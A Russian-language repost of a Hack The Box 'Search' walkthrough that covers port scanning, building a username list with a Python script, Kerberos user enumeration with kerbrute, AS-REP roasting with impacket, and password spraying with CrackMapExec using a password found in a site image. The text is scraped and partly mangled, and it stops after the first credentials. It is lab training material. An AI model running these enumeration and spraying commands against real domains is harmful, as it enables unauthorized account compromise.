Категория > Новости > HTB Search. Обходим AMSI в PowerShell Web Access при пентесте машины на Windows - «Новости»
HTB Search. Обходим AMSI в PowerShell Web Access при пентесте машины на Windows - «Новости»7-05-2022, 00:00. Автор: Макар |
Hack The Box. Ее уровень сложности — hard.warningПодключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками. РазведкаСканирование портов Добавляем IP-адрес машины в
10.10.11.129 search.htb
И запускаем сканирование портов. Справка: сканирование портовСканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа. Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта. ports=$(nmap -p- --min-rate=500 $1 | grep^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//)nmap -p$ports -A $1 Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция Результат работы скрипта У нас есть целая куча открытых портов:
На хосте работает много служб. Первым делом проверяем SMB и DNS, но они ничего не дают. Остается только веб. Так как на порте 443 используется протокол HTTPS, сразу обратим внимание на его сертификат. Поле
10.10.11.129 search.htb research
Главная страница сайтаИзучая сайт, обращаем внимание на список сотрудников. Персонал сервиса Так как на хосте работает Kerberos, мы можем проверить, существует ли какая‑то учетная запись. В этом нам поможет атака ASRep Roasting. Смысл в том, что мы посылаем на сервер аутентификации анонимный запрос для предоставления определенному пользователю доступа к какой‑либо услуге. На что сервер отвечает одним из трех действий:
Но сперва составим список пользователей. С помощью следующего кода мы можем составить все возможные комбинации имени пользователя:
#!/usr/bin/python3
names = ["Keely Lyons", "Dax Santiago", "Sierra Frye", "Kyla Stewart", "Kaiara Spencer", "Dave Simpson", "Ben Thomp
son", "Chris Stewart"]
list = ["Administrator", "Guest"]
for name in names:
n1, n2 = name.split(' ')
list.append(n1)
list.append(n1+n2)
list.append(n1+"."+n2)
list.append(n1+n2[0])
list.append(n1+"."+n2[0])
list.append(n2[0]+n1)
list.append(n2[0]+"."+n1)
list.append(n2)
list.append(n2+n1)
list.append(n2+"."+n1)
list.append(n2+n1[0])
list.append(n2+"."+n1[0])
list.append(n1[0]+n2)
list.append(n1[0]+"."+n2)
for n in list:
print(n)
Сохраним список в файл и выполним проверку с помощью kerbrute. Для этого используем опцию
kerbrute_linux_amd64 userenum --dcsearch.htb -dsearch.htb users.txt
Список пользователейВсе сканирование заняло примерно секунду, а мы получаем три существующих аккаунта. С помощью скрипта GetNPUsers.py из пакета impacket применяем к полученным именам ASRep Roasting в надежде получить зашифрованный пароль пользователя. Но безуспешно.
GetNPUsers.py search.htb/-usersfileusers.txt
Проверка ASRep RoastingПотратив очень много времени на поиск дальнейшего пути, я нашел на сайте фотографию Главная страница сайта При увеличении картинки стало понятно, что это список дел, среди которых есть такая строчка: «Send password to Hope Sharp». Заметки пользователя Проверяем это имя и узнаем, что такой аккаунт в системе есть. Проверка существования имени пользователя Теперь мы можем проверить и указанный пароль с помощью CrackMapExec.
crackmapexec smb search.htb -uusers.txt -p 'IsolationIsKey?'
Password Spraying с помощью CMEИ получаем первую учетку! Перейти обратно к новости |